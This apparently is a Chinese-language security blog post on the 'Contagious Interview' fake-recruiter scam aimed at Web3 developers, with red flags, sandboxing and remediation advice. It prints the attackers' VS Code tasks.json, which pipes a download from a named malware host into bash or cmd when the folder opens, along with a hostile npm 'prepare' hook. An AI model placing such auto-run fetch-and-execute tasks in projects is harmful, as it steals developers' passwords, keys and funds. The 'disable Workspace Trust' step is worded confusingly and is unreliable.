“传染性面试”:冒牌招聘人员如何黑掉开发者
执行摘要:新一波国家支持的攻击正在针对加密领域的高级开发人员。骗子冒充招聘人员和 CTO 来欺骗候选人打开恶意代码库。本文分析了 'Martin Erazo' 案例、VS Code 'tasks.json' 漏洞以及你生存所需的 '销毁协议'。
免责声明:本文报道了一起涉及冒充真人的特定网络安全事件。文中提及的名称 "Martin Erazo" 和 "Ara Vartanian" 仅指攻击者使用的“人设”或身份。我们相信拥有这些名字的真实人士是身份盗窃的无辜受害者,并未参与这些恶意活动。
Midjourney 提示词 (Prompts)
/imagine prompt: A dark, moody cybersecurity visualization of a developer's workstation, a red "WARNING" hologram projecting from a VS Code terminal, malicious code tendrils reaching for a crypto wallet icon, text "Contagious Interview" --ar 16:9/imagine prompt: A split screen composition. Left side: A friendly LinkedIn recruiter profile. Right side: A hacker in a hoodie executing a script, matrix code rain in background, text "Social Engineering" --ar 16:9/imagine prompt: A digital shield protecting a laptop, "VS Code Hardening" concept, sleek blue and white cybernetics, defending against red laser attacks --ar 16:9
1. 完美的诱饵:"Martin Erazo" 人设
它始于一条触动所有高级工程师痛点的信息:
- 角色: CTO / 高级架构师。
- 预算: 600 万美元融资已到位。
- 技术: Web3, AI, 去中心化基础设施。
在最近一次经核实的攻击中,一名冒充 "Martin Erazo" 的招聘人员通过 LinkedIn 进行了联系。该个人资料使用了一位真实剧院导演的姓名和照片,但工作经历被伪造,显示在 2025 年突然转向“IT 项目管理”——这是账号被盗或购买的典型迹象。
骗局转变得很快。他们跳过标准的 HR 筛选,直接进入与高层管理人员的“技术面试”——在本案中,是冒充业内真正的 CTO Ara Vartanian(目前在 Limit Break 任职)。
危险信号: 项目名称不断变化。招聘人员推销的是 "Betfin"(一个 GameFi 平台),但提供的宣传通过 (Pitch Deck) 却是 "SpaceXView"(一个元宇宙项目)。这种不一致是诈骗者重复利用不同活动资产的标志。
2. 陷阱:“检查我们的 MVP 代码”
冒牌 "CTO" 声称需要你用专家的眼光看看他们的 MVP 代码。他们发送一个 GitHub 仓库或 ZIP 文件。他们催促你 在 面试期间或之后立即打开它。
这就是攻击。
他们利用了你的友善和自负 (Ego)。你以为你是去给他们的 React 组件找 Bug。实际上,这些 Bug 是旨在清空你毕生积蓄的功能。
3. 技术漏洞:零点击 (Zero-Click) 恶意软件
攻击者使用针对开发工具的“零点击”或“少点击”漏洞。他们不需要你运行应用程序。他们只需要你 打开文件夹。
确凿证据 (The Smoking Gun): .vscode/tasks.json
在这个具体案例中,仓库包含一个武器化的 .vscode/tasks.json 文件。这个文件告诉 VS Code 如何构建项目。
恶意代码:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": 这是死亡开关。当你用 VS Code 打开文件夹的那一刻,这个任务会自动执行。
- 载荷 (Payload): 使用 curl 从
vscodesettingtask.vercel.app下载脚本。这是一个伪装成设置 API 的已知恶意软件主机。 - 结果: 脚本在内存中运行,立即窃取你的 Chrome 密码、会话 Cookie 和 SSH 密钥。
后备方案:package.json 脚本
如果 VS Code 漏洞利用失败,他们会操纵 npm 脚本:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
运行 npm install 或 npm start 会触发 server/server.js,这是一个本地命令和控制 (C2) 脚本,会将你的环境变量(AWS 密钥、钱包种子)外流给攻击者。
4. 危险信号 (Red Flags) vs. 安全信号 (Green Flags)
如何在为时已晚之前发现这一点?
如果你是开发者,请警惕“私有仓库”和 ZIP 文件。合法公司使用公共仓库或标准的回家作业测试 (Take-home tests)。
警告: 这不是开发者受到攻击的唯一方式。阅读关于 Discord 上的 协作者陷阱 以及 供应链攻击 如何危害你的依赖项。
| 🚩 危险信号 (快跑) | ✅ 安全信号 (安全) |
|---|---|
| 先给代码: 在发 Offer 前就发送代码。 | 标准流程: 先面试,后代码。 |
| 身份断层: 招聘人员没有相关历史(例如从艺术家变成 IT 经理)。 | 经核实的历史: LinkedIn 职业生涯连贯。 |
| 不一致: 项目名称不匹配 (Betfin vs. SpaceXView)。 | 连贯: 项目名称、文档和网站一致。 |
| 紧迫感: “CTO 在等着”,“现在就打开”。 | 耐心: 尊重你的时间和日程安排。 |
| 个人邮箱: [email protected] 或不匹配的域名。 | 企业邮箱: [email protected] (有活跃的 MX 记录)。 |
5. 安全协议:如何安全面试
如果你是高级开发人员,你 将 成为目标。加固你的环境是强制性的。
协议 1:“一次性” (Burner) 环境
永远不要 使用你的主力工作站进行代码测试。
- 虚拟机: 使用 VirtualBox 或 VMWare。
- 云 IDE: 使用 GitHub Codespaces 或 Gitpod。这些是临时的,并且与你的本地钱包文件隔离。
协议 2:取证审计
在打开 任何 未知代码之前:
- 检查 .vscode/tasks.json: 寻找
runOn: folderOpen。 - 检查 package.json: 寻找可疑的 preinstall 或 postinstall 脚本。
- 关键字搜索: Grep 搜索
curl,wget,os.homedir(),.ssh或wallet。
协议 3:VS Code 加固
全局禁用“工作区信任” (Workspace Trust)。
- 设置 -> 安全 -> 工作区 -> 信任:启动提示 -> 始终。
- 这强制 VS Code 在执行任何文件夹级任务之前询问许可。
6. 补救措施:“销毁协议” (The Burn Protocol)
如果你打开了一个恶意代码库(如 "Martin Erazo" 人设发送的那个),请假设你已受到威胁。系统还原 是不够的。
- 断开连接: 立即拔掉网线。
- 销毁钱包: 你的私钥已经泄露。在干净的设备(手机)上创建一个 新钱包 并转移剩余资金。永远不要再使用旧的种子。
- 终止会话: 登出 Google, GitHub 和 AWS 上的所有设备。撤销所有活动会话。
- 审计 SSH 密钥: 检查你的 GitHub/GitLab 设置。攻击者通常会添加 他们的 SSH 密钥以维持后门访问。删除任何你不认识的密钥。
- 彻底清除 (Nuke It): 擦除硬盘并重新安装操作系统。这是 100% 确定 Rootkit 被清除的唯一方法。
结论
“传染性面试”骗局利用你的专业知识来对付你。它针对的是你解决问题的意愿。但在 Web3 中,偏执是一种职业美德。验证每一个身份,沙盒化每一个代码库,永远不要相信一个催促你写代码的“招聘人员”。
